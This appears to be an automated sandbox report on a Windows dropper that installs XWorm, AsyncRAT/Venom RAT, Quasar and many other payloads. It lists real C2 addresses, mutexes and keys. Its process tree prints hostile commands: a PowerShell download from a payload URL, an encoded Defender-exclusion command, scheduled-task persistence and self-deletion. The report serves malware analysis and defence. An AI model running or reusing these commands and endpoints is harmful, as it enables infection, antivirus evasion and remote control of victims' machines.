Resubmissions

18-09-2024 16:12

240918-tnhy5a1cmp 10

16-08-2024 04:34

240816-e7ba3azckk 10

16-08-2024 04:25

240816-e14zssyhpq 10

16-08-2024 04:25

240816-e1x69ayhpk 3

15-08-2024 21:56

240815-1tbkka1fpq 10

15-08-2024 21:47

240815-1nkw2swfre 10

15-08-2024 21:46

240815-1m318s1cpr 3

15-08-2024 21:46

240815-1mkvnawflb 10

13-08-2024 22:28

240813-2dvtyazbph 10

25-06-2024 11:24

240625-nhwp5swhja 10

Analysis

  • max time kernel
    133s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 09:14

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted

Family

xworm

Version

5.0

C2

85.203.4.146:7000

Mutex

eItTbYBfBYihwkyW

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    svchost.exe

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

85.209.133.18:4545

Mutex

tdipywykihsjieff

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

79.132.193.215:4782

Mutex

f99ccef5-65c4-4972-adf2-fb38921cc9fc

Attributes
  • encryption_key

    1C15E91ACCFAC60B043A1336CF6912EA8572BA83

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Windows security bypass 2 TTPs 18 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 61 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 21 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4860
    • C:\Users\Admin\AppData\Local\Temp\a\xin.exe
      "C:\Users\Admin\AppData\Local\Temp\a\xin.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:4392
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
    • C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe
      "C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"
      2⤵
      • Executes dropped EXE
      PID:3576
    • C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe
      "C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3268
    • C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:5860
      • C:\Windows\SysWOW64\comp.exe
        C:\Windows\SysWOW64\comp.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:3080
        • C:\Users\Admin\AppData\Local\Temp\FUT.au3
          C:\Users\Admin\AppData\Local\Temp\FUT.au3
          4⤵
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:4892
    • C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4600
    • C:\Users\Admin\AppData\Local\Temp\a\win1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\win1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2680
    • C:\Users\Admin\AppData\Local\Temp\a\output.exe
      "C:\Users\Admin\AppData\Local\Temp\a\output.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2184
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF"
        3⤵
        • Checks processor information in registry
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:5288
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:6072
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D102CB75D170B7E09563B70E4305FCB0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D102CB75D170B7E09563B70E4305FCB0 --renderer-client-id=2 --mojo-platform-channel-handle=1688 --allow-no-sandbox-job /prefetch:1
            5⤵
              PID:4080
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=579B730976798954F9B9477E837D58A4 --mojo-platform-channel-handle=1820 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
              5⤵
                PID:5924
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A351653D3A0725C2DBE5EC83E49D63F1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A351653D3A0725C2DBE5EC83E49D63F1 --renderer-client-id=4 --mojo-platform-channel-handle=2324 --allow-no-sandbox-job /prefetch:1
                5⤵
                  PID:6740
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DD09B76343697999A87294AAC3B4CD7D --mojo-platform-channel-handle=2676 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                    PID:6700
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3CC32D3AA02115D5E08A5F796DA6BDE1 --mojo-platform-channel-handle=2732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    5⤵
                      PID:7920
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4436DEEF51B5BB6CF9FD1CF610E199B6 --mojo-platform-channel-handle=1816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      5⤵
                        PID:6244
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                      4⤵
                        PID:7676
                    • C:\Users\Admin\AppData\Local\Temp\SIG.EXE
                      "C:\Users\Admin\AppData\Local\Temp\SIG.EXE"
                      3⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of SetThreadContext
                      PID:4984
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                        4⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4524
                  • C:\Users\Admin\AppData\Local\Temp\a\alabi.exe
                    "C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5992
                  • C:\Users\Admin\AppData\Local\Temp\a\crt.exe
                    "C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:4700
                    • C:\Users\Admin\AppData\Local\Temp\is-F687I.tmp\crt.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-F687I.tmp\crt.tmp" /SL5="$1024A,5149750,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:5376
                      • C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
                        "C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -i
                        4⤵
                        • Executes dropped EXE
                        PID:7092
                      • C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
                        "C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -s
                        4⤵
                        • Executes dropped EXE
                        PID:6300
                  • C:\Users\Admin\AppData\Local\Temp\a\oiii.exe
                    "C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"
                    2⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    PID:7312
                  • C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
                    "C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
                    2⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    PID:4764
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                      3⤵
                        PID:1988
                        • C:\Windows\system32\mode.com
                          mode 65,10
                          4⤵
                            PID:5280
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e file.zip -p563741341569714296105326100 -oextracted
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5956
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_2.zip -oextracted
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5636
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_1.zip -oextracted
                            4⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of AdjustPrivilegeToken
                            PID:6468
                          • C:\Windows\system32\attrib.exe
                            attrib +H "svcshost.exe"
                            4⤵
                            • Views/modifies file attributes
                            PID:5160
                          • C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe
                            "svcshost.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2080
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /C powershell -EncodedCommand "PAAjAE0AbwBsAEIANwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAQgBUADIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMATgBDAEEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBiAFYAMABjAEoANQBSADEAVgBXACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                              5⤵
                                PID:1396
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -EncodedCommand "PAAjAE0AbwBsAEIANwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAQgBUADIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMATgBDAEEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBiAFYAMABjAEoANQBSADEAVgBXACMAPgA="
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3316
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                5⤵
                                  PID:7372
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                    6⤵
                                    • Creates scheduled task(s)
                                    PID:912
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6824" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                  5⤵
                                    PID:7196
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6824" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                      6⤵
                                      • Creates scheduled task(s)
                                      PID:6896
                            • C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe
                              "C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:8000
                              • C:\Users\Admin\AppData\Local\Temp\kat9313.tmp
                                C:\Users\Admin\AppData\Local\Temp\kat9313.tmp
                                3⤵
                                • Executes dropped EXE
                                PID:1540
                            • C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe
                              "C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:6364
                              • C:\Users\Admin\AppData\Local\Temp\kat9AB4.tmp
                                C:\Users\Admin\AppData\Local\Temp\kat9AB4.tmp
                                3⤵
                                • Executes dropped EXE
                                PID:5568
                            • C:\Users\Admin\AppData\Local\Temp\a\inte.exe
                              "C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
                              2⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              PID:6252
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit
                                3⤵
                                  PID:3196
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im "inte.exe" /f
                                    4⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:7084
                              • C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe
                                "C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:5384
                                • C:\Windows\SysWOW64\cmd.exe
                                  "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsz9B53.tmp\abc.bat"
                                  3⤵
                                    PID:5724
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
                                      4⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4968
                                • C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Drops file in Windows directory
                                  PID:2344
                                  • C:\Windows\sysblardsv.exe
                                    C:\Windows\sysblardsv.exe
                                    3⤵
                                    • Modifies security service
                                    • Windows security bypass
                                    • Executes dropped EXE
                                    • Windows security modification
                                    PID:7760
                                    • C:\Users\Admin\AppData\Local\Temp\259516163.exe
                                      C:\Users\Admin\AppData\Local\Temp\259516163.exe
                                      4⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      • Drops file in Windows directory
                                      PID:5608
                                      • C:\Windows\syslmgrsvc.exe
                                        C:\Windows\syslmgrsvc.exe
                                        5⤵
                                        • Modifies security service
                                        • Windows security bypass
                                        • Executes dropped EXE
                                        • Windows security modification
                                        • Suspicious behavior: SetClipboardViewer
                                        PID:3016
                                        • C:\Users\Admin\AppData\Local\Temp\2322128858.exe
                                          C:\Users\Admin\AppData\Local\Temp\2322128858.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:6080
                                        • C:\Users\Admin\AppData\Local\Temp\1345921245.exe
                                          C:\Users\Admin\AppData\Local\Temp\1345921245.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:1064
                                        • C:\Users\Admin\AppData\Local\Temp\624913175.exe
                                          C:\Users\Admin\AppData\Local\Temp\624913175.exe
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4608
                                        • C:\Users\Admin\AppData\Local\Temp\237345460.exe
                                          C:\Users\Admin\AppData\Local\Temp\237345460.exe
                                          6⤵
                                            PID:6368
                                          • C:\Users\Admin\AppData\Local\Temp\1397330615.exe
                                            C:\Users\Admin\AppData\Local\Temp\1397330615.exe
                                            6⤵
                                              PID:6068
                                        • C:\Users\Admin\AppData\Local\Temp\336738194.exe
                                          C:\Users\Admin\AppData\Local\Temp\336738194.exe
                                          4⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Drops file in Windows directory
                                          PID:6868
